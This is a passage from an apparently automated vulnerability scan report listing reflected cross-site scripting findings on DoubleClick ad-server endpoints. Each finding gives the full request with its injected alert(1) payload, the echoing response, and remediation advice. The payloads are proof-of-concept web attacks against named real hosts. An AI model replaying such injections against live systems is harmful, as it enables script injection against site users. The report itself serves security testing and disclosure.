Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: g="aABKtKkgA==A-aWrFdouoM2KET|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpCwYc=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:44 GMT
Set-Cookie: u="aABnA6AkA==AI89bBrQ==AAABLzpCwYY=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:44 GMT
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: f="aAB1tgxqQ==AK1302352544AB1AAABLzpCwYU=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:44 GMT
Set-Cookie: s="aACeHA9_w==AE9479AN1294103956000AAABLzpCwYU=AE8438AN1275963655000AAABLzpCwYU=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:44 GMT
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:44 GMT
Set-Cookie: a=c369295169464782579;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:44 GMT
Set-Cookie: j=c369295169464782579;Path=/;Domain=.rfihub.com
Set-Cookie: o=1-RvuhyLCM5c93;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:44 GMT
Set-Cookie: p=1-RvuhyLCM5c93;Path=/;Domain=.rfihub.com
Set-Cookie: r=1302352544134;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:44 GMT
Content-Length: 2847

<html><body><span id="__rfi" style="height:0px; width:0px"><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352544133;click=h
...[SNIP]...
' border=0 width=0 height=0 src='http://a.rfihub.com/tk.gif?rb=445&re=12387&aa=9530,84152,12352,361230,824,10261,WrFdouoM2KET,http%3A%2F%2Frocketfuelinc.com,492,1249,38387,1279,6613&pa=ppre35252550824788e8f'><script>alert(1)</script>2f874ec50da&id=&ra=3525441350.3508423759469188'>
...[SNIP]...

1.6. http://ad.doubleclick.net/adi/fnc/root/stocksearch [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/fnc/root/stocksearch

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85b07"style%3d"x%3aexpression(alert(1))"b41c0a38777 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 85b07"style="x:expression(alert(1))"b41c0a38777 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/fnc/root/stocksearch;pos=stocksearch;fnc=ad;sz=88x31;ord=781297988?&85b07"style%3d"x%3aexpression(alert(1))"b41c0a38777=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 574

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/0/0/%2a/y;235228619;0-0;1;22676449;21-88/31;40472641/40490428/1;;~okv=;pos=stocksearch;fnc=ad;sz=88x31;;85b07"style="x:expression(alert(1))"b41c0a38777=1;~aopt=2/1/8b/0;~sscs=%3fhttp://ad.doubleclick.net/clk;235657212;58880944;s">
...[SNIP]...

1.7. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.rocketfuelincOX15601/B4639841.2

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa07e"-alert(1)-"aeaa2972497 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529146;click=http://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcX&aa07e"-alert(1)-"aeaa2972497=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:36:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7011

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Mon Jun 28 15:03:57 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
0/250%3B37372498/37390376/1%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcX&aa07e"-alert(1)-"aeaa2972497=1http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167480");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "neve
...[SNIP]...

1.8. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.rocketfuelincOX15601/B4639841.2

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 115ba'-alert(1)-'12c0aaa9aad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529146;click=http://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcX&115ba'-alert(1)-'12c0aaa9aad=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:36:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7011

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Mon Jun 28 15:03:57 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
0/250%3B37372498/37390376/1%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcX&115ba'-alert(1)-'12c0aaa9aad=1http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167480\">
...[SNIP]...

1.9. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.rocketfuelincOX15601/B4639841.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4c81"-alert(1)-"532b4a5b9ac was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529146;click=http://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcXa4c81"-alert(1)-"532b4a5b9ac HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:35:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6969

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Mon Jun 28 15:03:57 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
00/250%3B37372498/37390376/1%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcXa4c81"-alert(1)-"532b4a5b9achttp://www.devry.edu/degree-programs/colleges-overview.jsp?vc=167480");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var ope
...[SNIP]...

1.10. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.rocketfuelincOX15601/B4639841.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdf1b'-alert(1)-'b9757c6ddd4 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529146;click=http://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcXcdf1b'-alert(1)-'b9757c6ddd4 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:35:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6969

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Mon Jun 28 15:03:57 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
00/250%3B37372498/37390376/1%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcXcdf1b'-alert(1)-'b9757c6ddd4http://www.devry.edu/degree-programs/colleges-overview.jsp?vc=167480\">
...[SNIP]...

1.11. http://ad.doubleclick.net/adj/cm.foxnews/tier2_031010 [net parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.foxnews/tier2_031010

Issue detail

The value of the net request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2addd'%3balert(1)//0280304bd4f was submitted in the net parameter. This input was echoed as 2addd';alert(1)//0280304bd4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.foxnews/tier2_031010;net=2addd'%3balert(1)//0280304bd4f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 400
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 11 Apr 2011 16:21:51 GMT
Expires: Mon, 11 Apr 2011 16:21:51 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/0/0/%2a/p;239769129;2-0;0;46850814;255-0/0;41621127/41638914/1;;~okv=;net=2addd';alert(1)//0280304bd4f;~aopt=2/1/e4/0;~sscs=%3fhttps://mastercard.choicepay.com/mcfed/mastercard6.jsp">
...[SNIP]...

1.12. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/detail [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/iblocal.hearsttv.wptz/detail

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99899'-alert(1)-'228a68fc46 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.hearsttv.wptz/detail99899'-alert(1)-'228a68fc46;kw=containerlinkswelike;pos=1;sz=253x300;ord=4697446210775524? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:31:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1289

document.write('<!-- Template ID = 14867 Template Name = Container for Links We Like - 3 stacked -->\n<div class=\"ib_container\">\n    <div class=\"ib_ad\" id=\"ib_div_pos1_1\">\n        ');

docu
...[SNIP]...
<scr'+'ipt type="text/javascript" src="http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/detail99899'-alert(1)-'228a68fc46;kw=linkswelike;sz=88x31;pagepos=1;pos=1;tile=1;ord=6865167?">
...[SNIP]...

1.13. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/index [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/iblocal.hearsttv.wptz/index

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26096'-alert(1)-'66ba3d012db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.hearsttv.wptz/index26096'-alert(1)-'66ba3d012db;kw=containerlinkswelike;pos=1;sz=253x300;ord=8710159196052700? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/index.html
